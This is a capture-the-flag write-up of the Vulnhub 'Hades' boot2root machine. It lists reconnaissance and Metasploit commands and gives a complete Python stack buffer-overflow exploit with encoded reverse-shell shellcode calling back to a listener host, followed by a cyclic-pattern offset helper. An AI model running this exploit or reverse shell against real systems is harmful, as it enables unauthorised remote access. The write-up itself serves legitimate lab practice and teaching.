Aerosol

cracking the infernal hades


About a month ago, Vulnhub released a boot2root image built by Lok_Sigma called Hades. The box promised to be full of annoyances and it delivered them in droves. Requiring a combination of exploit development, reverse engineering and some out of the box thinking, I really enjoyed this challenge. I decided to share my solution now that the competition is over. It goes without saying this post has a lot of SPOILERS!

Big thanks go out to the Vulnhub team for the awesome work they do. Follow them on Twitter to keep up with the latest releases.

If you want to tackle Hades yourself, you can grab a copy of the machine here.

Enjoy


Commands Used

# Host Discovery
netdiscover -r 10.0.0.0/24

# Service Enumeration
nmap -v -sS -T4 -n -p- 10.0.0.129 && us -mU -v -p 1-65535 10.0.0.129

# Base64 Decryption
base64 -d ssh-hades > hades.bin

# Pattern Creation
/opt/metasploit-framework/tools/pattern_create 1000

# Offset Search
/opt/metasploit-framework/tools/pattern_offset.rb Af7A
/opt/metasploit-framework/tools/pattern_offset.rb 5Af6
/opt/metasploit-framework/tools/pattern_offset.rb 0x34654133

# Finding Assembly Shellcode
/opt/metasploit-framework/tools/metasm_shell.rb
metasm> jmp $esp+80

# Reverse Shell Payload
msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.130 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b \x00\x0a\x0d -t python

# Improved Shell
python -c "import pty; pty.spawn('/bin/sh')"

# File Decryption
openssl enc -d -aes-256-cbc -in flag.txt.enc -out flag.txt -pass file:key_file
Finished Exploit – Hades

#!/usr/bin/env python
import socket, struct

target = '10.0.0.129'
port = 65535

# Shellcode
# msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.130 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b \x00\x0a\x0d -t python
# [*] x86/shikata_ga_nai succeeded with size 95 (iteration=1)
buf =  ""
buf += "\xda\xc7\xd9\x74\x24\xf4\x5d\xba\xc4\xe0\xc2\x40\x2b"
buf += "\xc9\xb1\x12\x83\xed\xfc\x31\x55\x13\x03\x91\xf3\x20"
buf += "\xb5\x28\x2f\x53\xd5\x19\x8c\xcf\x70\x9f\x9b\x11\x34"
buf += "\xf9\x56\x51\xa6\x5c\xd9\x6d\x04\xde\x50\xeb\x6f\xb6"
buf += "\x68\x0b\x90\xc4\x05\x09\x90\xd9\x89\x84\x71\x69\x57"
buf += "\xc7\x20\xda\x2b\xe4\x4b\x3d\x86\x6b\x19\xd5\x36\x43"
buf += "\xed\x4d\x21\xb4\x73\xe4\xdf\x43\x90\xa4\x4c\xdd\xb6"
buf += "\xf8\x78\x10\xb8"

# Buffer
#buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B'
buffer = '\x90'*11
buffer += buf
buffer += '\x90'*(131-95-11)
buffer += '\xeb\x4e\x90\x90' # esp - 0x2c
buffer += 'F'*(167-4-131)
buffer += 'B'*4 # ebp
buffer += struct.pack("<L",0x08048694) # eip
buffer += 'D'*(1000-4-4-167)

# Connect and send payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.send(buffer)
data = s.recv(1024)
s.close()
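The pattern_create / pattern_offset steps in the command list are what turn the crash registers into the 131 / 167 / 171 offsets hard-coded in the exploit, and that arithmetic can be checked without Metasploit. The following is an added example, not the author's code and not Metasploit's own implementation: it reimplements the cyclic-pattern scheme in Python 3 and resolves the three lookups from the write-up (the 1000-byte length and the query values are taken from the commands above; everything else is constructed here).

```python
#!/usr/bin/env python3
"""Cyclic pattern generation and offset lookup (crash-triage helper).

Reimplements the Metasploit 'Aa0Aa1Aa2...Az9Ba0...' scheme so the offsets
used in the write-up can be reproduced and audited offline.
"""
import string
import struct


def pattern_create(length):
    """Return the first LENGTH characters of the non-repeating pattern.

    Every 3-byte window is unique for the first 20280 bytes, so any 4 bytes
    read back from a register identify a single position in the buffer.
    """
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(query, length=1000):
    """Return the offset of QUERY in the pattern, or None if absent.

    QUERY is either the characters seen in memory (str) or a register value
    (int); an int is little-endian on x86, so its bytes appear reversed in
    memory and are unpacked with struct before searching.
    """
    if isinstance(query, int):
        query = struct.pack("<L", query).decode("ascii")
    pos = pattern_create(length).find(query)
    return pos if pos >= 0 else None


if __name__ == "__main__":
    # The three lookups from the write-up: EIP bytes, EBP bytes, ESP value.
    print("EIP 'Af7A'      ->", pattern_offset("Af7A"))        # 171
    print("EBP '5Af6'      ->", pattern_offset("5Af6"))        # 167
    print("ESP 0x34654133  ->", pattern_offset(0x34654133))    # 131
```

The results match the exploit's layout: 131 bytes precede the slot ESP lands on, the saved EBP sits at 167 and the return address at 167 + 4 = 171.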